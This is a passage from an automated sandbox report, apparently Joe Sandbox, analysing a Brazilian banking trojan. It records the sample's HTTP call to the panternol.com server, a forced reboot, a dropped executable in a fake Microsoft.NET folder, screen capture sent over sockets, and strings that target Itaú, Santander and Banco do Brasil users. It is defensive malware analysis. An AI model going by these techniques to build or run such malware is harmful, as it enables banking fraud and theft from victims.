2024-11-25 10:13:25 UTC	16384	IN	Data Raw: 54 25 fd 9e 2f f1 38 ba 9f 1f e6 47 0f 64 82 af af fa c2 30 b2 9f 21 55 3a 30 6f e6 f1 8b 79 08 81 4b a1 22 0d f9 f2 c3 4a 6d 50 a8 3a 47 62 1d b9 ec c7 5c b6 39 1c 79 dc 87 92 16 da e6 17 e6 8a 9f 0b e5 73 d2 f8 69 25 09 53 3b 8d e8 95 37 06 a3 b7 4e 08 46 af bc 00 8d ca 24 b1 43 8e fc c7 87 92 8c b0 2e 1d b2 02 2b bb a5 50 ca 6c 80 49 5f ee 01 4c bc e6 7e 1e 27 6c 0c 3b f7 6b 9f 09 71 9b 04 8b b5 a0 1e 38 a4 ba 50 01 70 48 2d 20 d9 4c bb 1f 6f 0c 6d b4 5b a5 7a dd 8e 9a cf 45 92 d6 eb 14 ca a9 42 d6 92 2b 6e 16 ca ef 82 7d 58 8b 59 85 f2 05 a9 66 60 50 22 f0 6e 22 e9 e5 44 e0 e6 44 20 2f 05 4f f2 ac 42 c5 2d a9 1c 8e 9a 3b 71 17 af 17 1e 3d 44 8b 71 a8 0d 55 22 92 50 be c7 8a 81 b9 42 79 98 02 b9 42 f9 16 0a 5c 2e 94 bf 4d 81 6b 85 f2 5a 1c 82 de 05 42 Data Ascii: T%/8Gd0!U:0oyK"JmP:Gb\9ysi%S;7NF$C.+PlI_L~'l;kq8PpH- Lom[zEB+n}XYf`P"n"DD /OB-;q=DqU"PByB\.MkZB
2024-11-25 10:13:25 UTC	16384	IN	Data Raw: a1 7a 2e 57 42 28 a7 51 51 d0 60 65 37 ac 24 d4 58 5e 35 ab 72 5c c5 28 dd b0 f2 de e5 1c cb 5a 6b e8 6a 0a ba a4 8f 6e eb b2 de 15 6b e9 08 b5 5c 74 85 5a d4 46 b5 14 fa 59 d5 e2 a4 36 51 95 7f 42 27 ea 47 9d 89 55 79 57 d5 16 aa de 29 2b 54 a5 fa ac 4a f9 55 b5 a9 18 a7 a1 a9 21 68 f6 a0 30 59 39 41 e6 52 51 90 d9 d1 bc 8b e4 c9 14 b5 b2 6a c6 e9 47 55 0b ab e2 2d e9 49 b0 2b 4d 7a 6a 09 55 5a 93 9e 4c 3f 25 b5 0d e9 5f c3 2e af 6d c2 34 aa 96 a1 3c 4a 51 1e 9a 42 55 97 92 94 4f 09 a1 6a 1c c9 2f a7 25 94 33 2c 27 94 b3 91 da b8 8c ac bc 20 0b af 21 c8 94 fa 94 6f 75 ca b3 9a 20 d3 a0 f2 66 55 8f ab 1a 25 f5 55 56 86 c6 bd 04 c1 b0 97 64 8f ea 4d ac ad 21 68 f7 50 b5 8b b6 d4 2e d5 b5 85 ea d4 3f aa db 11 53 7b 54 6f 5d 99 fa 2b 5d 13 a4 b3 3e e9 ac 4f Data Ascii: z.WB(QQ`e7$X^5r\(Zkjnk\tZFY6QB'GUyW)+TJU!h0Y9ARQjGU-I+MzjUZL?%_.m4<JQBUOj/%3,' !ou fU%UVdM!hP.?S{To]+]>O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	34.95.207.248	443	7120	C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:13:28 UTC	101	OUT	GET /cacher/ HTTP/1.1 Host: panternol.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-11-25 10:13:29 UTC	216	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:13:29 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 X-Powered-By: PHP/8.0.30 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	05:12:59
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe"
Imagebase:	0x720000
File size:	11'252'752 bytes
MD5 hash:	F8720F77959ACDA03BD5B2B4A3698848
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:13:25
Start date:	25/11/2024
Path:	C:\Windows\System32\shutdown.exe
Wow64 process (32bit):	false
Commandline:	shutdown /r /t 30
Imagebase:	0x7ff6dbc80000
File size:	28'160 bytes
MD5 hash:	F2A4E18DA72BB2C5B21076A5DE382A20
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:13:25
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f330000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:13:36
Start date:	25/11/2024
Path:	C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe"
Imagebase:	0x7ff6b40a0000
File size:	103'736 bytes
MD5 hash:	CCCA2C0E6653506652437868D1049817
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	05:13:44
Start date:	25/11/2024
Path:	C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe"
Imagebase:	0x7ff6b40a0000
File size:	103'736 bytes
MD5 hash:	CCCA2C0E6653506652437868D1049817
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 00794520 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1979450270.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.1978832878.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979632111.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1980125959.0000000000C23000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1980573422.0000000000C26000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1980933050.0000000000C27000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1980963667.0000000000C28000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981083691.0000000000C4B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981108566.0000000000C4C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981123555.0000000000C4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981144022.0000000000C5C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981160879.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981160879.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981160879.0000000000CA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981225914.0000000000CAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981225914.0000000000D31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981225914.0000000000D4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981508995.0000000000EED000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981604670.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_leg#U00edvel9931-009-140.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cff9fe2135e67e95bb574443de1d06a8e0b8e89167aa2be6e3a61b8e8eda4513
Instruction ID: 9f39eb951dd337d7d51a6bac056ceba1117256af2e876d3130bcf9a0661bd4ce
Opcode Fuzzy Hash: cff9fe2135e67e95bb574443de1d06a8e0b8e89167aa2be6e3a61b8e8eda4513
Instruction Fuzzy Hash: 2E31992791CFC482D2218B24F5417AAB364F7A9794F15A715EFC812A1ADB38E2E5CB40

Function 00790860 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1979450270.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.1978832878.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979632111.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1980125959.0000000000C23000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1980573422.0000000000C26000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1980933050.0000000000C27000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1980963667.0000000000C28000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981083691.0000000000C4B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981108566.0000000000C4C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981123555.0000000000C4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981144022.0000000000C5C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981160879.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981160879.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981160879.0000000000CA7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981225914.0000000000CAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981225914.0000000000D31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981225914.0000000000D4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981508995.0000000000EED000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1981604670.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_leg#U00edvel9931-009-140.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e2dc365eeaf7d755159d019c6b8806dfc90132728faab9ca90f57871b6c792b
Instruction ID: 61876a4bcff0ad27adf8872f271068ac1d26b55cf645d75703702ebad38554f3
Opcode Fuzzy Hash: 6e2dc365eeaf7d755159d019c6b8806dfc90132728faab9ca90f57871b6c792b
Instruction Fuzzy Hash:

Analysis Process: 8pIuMUYQX9q.exePID: 2056, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	59.2%
Signature Coverage:	43.1%
Total number of Nodes:	353
Total number of Limit Nodes:	19

Executed Functions

Function 0000000180013480 Relevance: 109.3, APIs: 31, Strings: 31, Instructions: 757
networksleepwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000180004F20: GetModuleFileNameW.KERNEL32 ref: 0000000180004F6A

WSAStartup.WS2_32 ref: 0000000180013A58
GdiplusStartup.GDIPLUS ref: 0000000180013A8B
_Thrd_detach.LIBCPMT ref: 0000000180013B2C
Sleep.KERNEL32 ref: 0000000180013B4A
GetDesktopWindow.USER32 ref: 0000000180013FB1
GetWindowRect.USER32 ref: 0000000180013FC2
MagSetWindowSource.MAGNIFICATION ref: 0000000180013FE8
RedrawWindow.USER32 ref: 0000000180014000
GdipCreateBitmapFromScan0.GDIPLUS ref: 0000000180014073
CLSIDFromString.OLE32 ref: 000000018001409F
CreateStreamOnHGlobal.OLE32 ref: 00000001800140BC
GdipSaveImageToStream.GDIPLUS ref: 00000001800140E0
GdipDisposeImage.GDIPLUS ref: 0000000180014170
send.WS2_32 ref: 00000001800141D5
send.WS2_32 ref: 00000001800141F6
closesocket.WS2_32 ref: 0000000180014204
recv.WS2_32 ref: 0000000180014230
closesocket.WS2_32 ref: 000000018001424C
Sleep.KERNEL32 ref: 0000000180014269
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180014314
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018001431A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180014320
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180014326
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180014387
Concurrency::cancel_current_task.LIBCPMT ref: 000000018001438D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180014392
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800143B0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800143B6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800143BC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800143C2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800143C8

Strings

Falha ao executar a consulta WMI., xrefs: 0000000180014873
itauaplicativo.exe, xrefs: 0000000180014A17
ios_base::eofbit set, xrefs: 0000000180014342
Acesso indisponvel sistema em modo ocioso.Essa ao necessria para concluir a atualizao de seu computador.Seu Aplicativo s, xrefs: 0000000180014ED5, 000000018001577B, 0000000180016C5A
ancodobrasi:B2, xrefs: 0000000180015097
2, xrefs: 0000000180014671
SantanderIBPF:B5, xrefs: 0000000180015145
ROOT\CIMV2, xrefs: 0000000180014510
ios_base::badbit set, xrefs: 0000000180014330
Ateno - Aplicativo Itu, xrefs: 0000000180014BE7
Para utilizar o Aplicativo Itu necessrio desinstalar todos os programas de acesso remoto como TeamViewer ou AnyDesk., xrefs: 0000000180014BEE
TeamViewer_Service.exe, xrefs: 0000000180014A57
Falha ao inicializar a segurana., xrefs: 000000018001447F
.json, xrefs: 000000018001352E
ios_base::failbit set, xrefs: 000000018001433B
WQL, xrefs: 00000001800147AC
bancoita:B3, xrefs: 00000001800150D1
avegadorexclusiv:B4, xrefs: 000000018001510B
e.jpg, xrefs: 0000000180013C80
.txt, xrefs: 0000000180014C80, 0000000180015350, 000000018001597F, 0000000180015F85, 000000018001658C, 00000001800169D5, 0000000180016B5E
Falha ao inicializar COM., xrefs: 0000000180014432
Falha ao definir o proxy blanket., xrefs: 0000000180014609
{557CF406-1A04-11D3-9A73-0000F81EF32E}, xrefs: 0000000180014098
Anydesk.exe, xrefs: 0000000180014ADF
SELECT ProcessId FROM Win32_Process WHERE Name = ', xrefs: 000000018001467A
Falha ao conectar ao namespace ROOT\CIMV2., xrefs: 00000001800145AC
&, xrefs: 0000000180014066
erenciadorfinanceir:B2, xrefs: 000000018001505D
nternetbankingca:B1, xrefs: 0000000180015023
Falha ao criar IWbemLocator., xrefs: 00000001800144CB
TeamViewer.exe, xrefs: 0000000180014A9E

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Window$Gdip$CreateFromImageSleepStartupStreamclosesocketsend$BitmapConcurrency::cancel_current_taskDesktopDisposeFileGdiplusGlobalModuleNameRectRedrawSaveScan0SourceStringThrd_detachrecv
String ID: &$.json$.txt$2$Acesso indisponvel sistema em modo ocioso.Essa ao necessria para concluir a atualizao de seu computador.Seu Aplicativo s$Anydesk.exe$Ateno - Aplicativo Itu$Falha ao conectar ao namespace ROOT\CIMV2.$Falha ao criar IWbemLocator.$Falha ao definir o proxy blanket.$Falha ao executar a consulta WMI.$Falha ao inicializar COM.$Falha ao inicializar a segurana.$Para utilizar o Aplicativo Itu necessrio desinstalar todos os programas de acesso remoto como TeamViewer ou AnyDesk.$ROOT\CIMV2$SELECT ProcessId FROM Win32_Process WHERE Name = '$SantanderIBPF:B5$TeamViewer.exe$TeamViewer_Service.exe$WQL$ancodobrasi:B2$avegadorexclusiv:B4$bancoita:B3$e.jpg$erenciadorfinanceir:B2$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$itauaplicativo.exe$nternetbankingca:B1${557CF406-1A04-11D3-9A73-0000F81EF32E}
API String ID: 1276291476-689969558
Opcode ID: e2fdadf5a1984257dc522d091b7c8128bd87c78d43e8c04779815450e8ce2e67
Instruction ID: 0f4cbb310ec251cea43252167114b4a37d202296f5eb0ea508be31d6ec1516a5
Opcode Fuzzy Hash: e2fdadf5a1984257dc522d091b7c8128bd87c78d43e8c04779815450e8ce2e67
Instruction Fuzzy Hash: 5F823E32218BC881EBA2DB15E8453DEB361F79D7D4F508615EA9D47AE9DF78C288C700

Function 000000018000E860 Relevance: 60.3, APIs: 23, Strings: 11, Instructions: 762COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32 ref: 000000018000E897
CoInitializeSecurity.OLE32 ref: 000000018000E8E2
CoUninitialize.OLE32 ref: 000000018000E900
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000EE03
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000EE25
GetWindowTextA.USER32 ref: 000000018000EE9A

Part of subcall function 000000018001FE10: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018001FF5F
Part of subcall function 000000018001FE10: Concurrency::cancel_current_task.LIBCPMT ref: 000000018001FF6B

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000F3B2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000F3B8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000F3BE
Concurrency::cancel_current_task.LIBCPMT ref: 000000018000F3C4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000F3CA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000F3D0

Strings

Falha ao conectar ao namespace ROOT\CIMV2., xrefs: 000000018000EA1B
Falha ao executar a consulta WMI., xrefs: 000000018000ECE3
WQL, xrefs: 000000018000EC1A
ProcessId, xrefs: 000000018000ED48
Falha ao inicializar COM., xrefs: 000000018000E8A1
Falha ao definir o proxy blanket., xrefs: 000000018000EA77
Falha ao criar IWbemLocator., xrefs: 000000018000E938
Falha ao inicializar a segurana., xrefs: 000000018000E8EC
ROOT\CIMV2, xrefs: 000000018000E97D
SELECT ProcessId FROM Win32_Process WHERE Name = ', xrefs: 000000018000EAE8
2, xrefs: 000000018000EADF

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskInitialize$SecurityTextUninitializeWindow
String ID: 2$Falha ao conectar ao namespace ROOT\CIMV2.$Falha ao criar IWbemLocator.$Falha ao definir o proxy blanket.$Falha ao executar a consulta WMI.$Falha ao inicializar COM.$Falha ao inicializar a segurana.$ProcessId$ROOT\CIMV2$SELECT ProcessId FROM Win32_Process WHERE Name = '$WQL
API String ID: 1607702356-808518417
Opcode ID: 93a85988ab131327860deb83d19acb6d4162c50c8f67ad216ad7855c0179f480
Instruction ID: 12377cfe40cf53a062b8303da9fcee2506909a2a45f7ba3199895269321e28a3
Opcode Fuzzy Hash: 93a85988ab131327860deb83d19acb6d4162c50c8f67ad216ad7855c0179f480
Instruction Fuzzy Hash: 6762AD32704B8886EB92CF65E4543DD73A1F789BD4F508625EA6D17B99DF38C689C300

Function 00000001800170A0 Relevance: 46.2, APIs: 18, Strings: 8, Instructions: 736
threadfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?), ref: 0000000180017761
SleepEx.KERNELBASE ref: 0000000180017894
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018001789F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800178A5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800178AB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800178B1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800178B7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800178BD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180017917
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018001791D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180017929
CreateThread.KERNELBASE ref: 0000000180017977
CreateThread.KERNELBASE ref: 0000000180017994
_Thrd_detach.LIBCPMT ref: 0000000180017A40
_Thrd_detach.LIBCPMT ref: 0000000180017A75

Part of subcall function 0000000180035FF0: CloseHandle.KERNELBASE(?,?,?,?,0000000180003AC1), ref: 0000000180035FF7

CreateMutexExA.KERNELBASE ref: 0000000180017BC4
GetLastError.KERNEL32 ref: 0000000180017BCA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180017CC8

Strings

ios_base::failbit set, xrefs: 00000001800178D4
DADOS:, xrefs: 0000000180017686
3.ini, xrefs: 00000001800174A8
ios_base::eofbit set, xrefs: 00000001800178DB
Taskmgr.exe, xrefs: 0000000180017296
ManagerServiceAppMU, xrefs: 0000000180017BB9
explorer.exe, xrefs: 0000000180017124
ios_base::badbit set, xrefs: 00000001800178C8

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Create$Thrd_detachThread$CloseDeleteErrorFileHandleLastMutexSleep
String ID: 3.ini$DADOS:$ManagerServiceAppMU$Taskmgr.exe$explorer.exe$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 843813353-1450361958
Opcode ID: 8d1ff6f005060dc8e49c908bc7ec3deb1094362da1156602d1d03464465cbc25
Instruction ID: 3ed3715bc77e289c9838b43006004ef7525b95dc083460810aee7d376c29beb3
Opcode Fuzzy Hash: 8d1ff6f005060dc8e49c908bc7ec3deb1094362da1156602d1d03464465cbc25
Instruction Fuzzy Hash: E9725932714B8885EB42DB64E8943DE6372F7887E4F508615FA9D47AEADF78C648C700

Function 00000001800059D0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 141
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleExW.KERNEL32 ref: 0000000180005A0B
MagInitialize.MAGNIFICATION ref: 0000000180005A16
LoadCursorW.USER32 ref: 0000000180005A6C
RegisterClassExW.USER32 ref: 0000000180005A8D
GetDesktopWindow.USER32 ref: 0000000180005A93
GetWindowRect.USER32 ref: 0000000180005AA1
CreateWindowExW.USER32 ref: 0000000180005AE8
SetLayeredWindowAttributes.USER32 ref: 0000000180005B12
CreateWindowExW.USER32 ref: 0000000180005B61
MagSetWindowTransform.MAGNIFICATION ref: 0000000180005BA1
MagSetImageScalingCallback.MAGNIFICATION ref: 0000000180005BB5
GetMessageW.USER32 ref: 0000000180005BD6
TranslateMessage.USER32 ref: 0000000180005BE4
DispatchMessageW.USER32 ref: 0000000180005BEE
GetMessageW.USER32 ref: 0000000180005C00
MagUninitialize.MAGNIFICATION ref: 0000000180005C0A
MessageBoxW.USER32 ref: 0000000180005C27

Strings

Falha ao inicializar a ampliao, xrefs: 0000000180005C1E
MagnifierControl, xrefs: 0000000180005B1F
Magnifier Window, xrefs: 0000000180005AAB
Erro, xrefs: 0000000180005C17
Magnifier, xrefs: 0000000180005B2B
MagnifierHost, xrefs: 0000000180005A72

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Window$Message$Create$AttributesCallbackClassCursorDesktopDispatchHandleImageInitializeLayeredLoadModuleRectRegisterScalingTransformTranslateUninitialize
String ID: Erro$Falha ao inicializar a ampliao$Magnifier$Magnifier Window$MagnifierControl$MagnifierHost
API String ID: 2943345537-928899896
Opcode ID: 22d82efbdff6380dcb03b1c00700b43be2f677f61b5826d11d691c6ea5a34f7c
Instruction ID: 1e5daa481674aaa46266242a201c2d412dde95078213dc9f7e13e32737fd4545
Opcode Fuzzy Hash: 22d82efbdff6380dcb03b1c00700b43be2f677f61b5826d11d691c6ea5a34f7c
Instruction Fuzzy Hash: 5A715A32A14B448AF791CF64F8407DE77B5F74C788F608116FA9956A68EF78C289CB40

Function 00007FFE1A511800 Relevance: 25.9, APIs: 17, Instructions: 354
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetLastError.KERNEL32 ref: 00007FFE1A511854
GetNativeSystemInfo.KERNELBASE ref: 00007FFE1A5118DA
VirtualAlloc.KERNELBASE ref: 00007FFE1A51192F
VirtualAlloc.KERNEL32 ref: 00007FFE1A51194E
VirtualAlloc.KERNEL32 ref: 00007FFE1A5119B1
GetProcessHeap.KERNEL32 ref: 00007FFE1A5119D2
HeapAlloc.KERNEL32 ref: 00007FFE1A5119E6
VirtualFree.KERNEL32 ref: 00007FFE1A511A03
VirtualFree.KERNEL32 ref: 00007FFE1A511A1F
SetLastError.KERNEL32 ref: 00007FFE1A511A3C
SetLastError.KERNEL32 ref: 00007FFE1A511D42

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Virtual$Alloc$ErrorLast$FreeHeap$InfoNativeProcessSystem
String ID:
API String ID: 1282860858-0
Opcode ID: 4ccbbaeef26f60834d5a07d0ed6896b2e53595f917afba97d805fc4afbda0b93
Instruction ID: 9fee4ea571343c2562f9748d6233d398d97d5dd03b13ce0c08f0a77a751bfd69
Opcode Fuzzy Hash: 4ccbbaeef26f60834d5a07d0ed6896b2e53595f917afba97d805fc4afbda0b93
Instruction Fuzzy Hash: 79E16B36B1DF4286EA648B17E45077976A2FF4AF94F4844FACA4D47BA1EE3CE4418700

Function 00007FFE1A513480 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MyCallUpdate, xrefs: 00007FFE1A5137AF
Funo Limpar chamada com sucesso!, xrefs: 00007FFE1A51384B
\FrontendCybersecurity.json, xrefs: 00007FFE1A5135D0

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

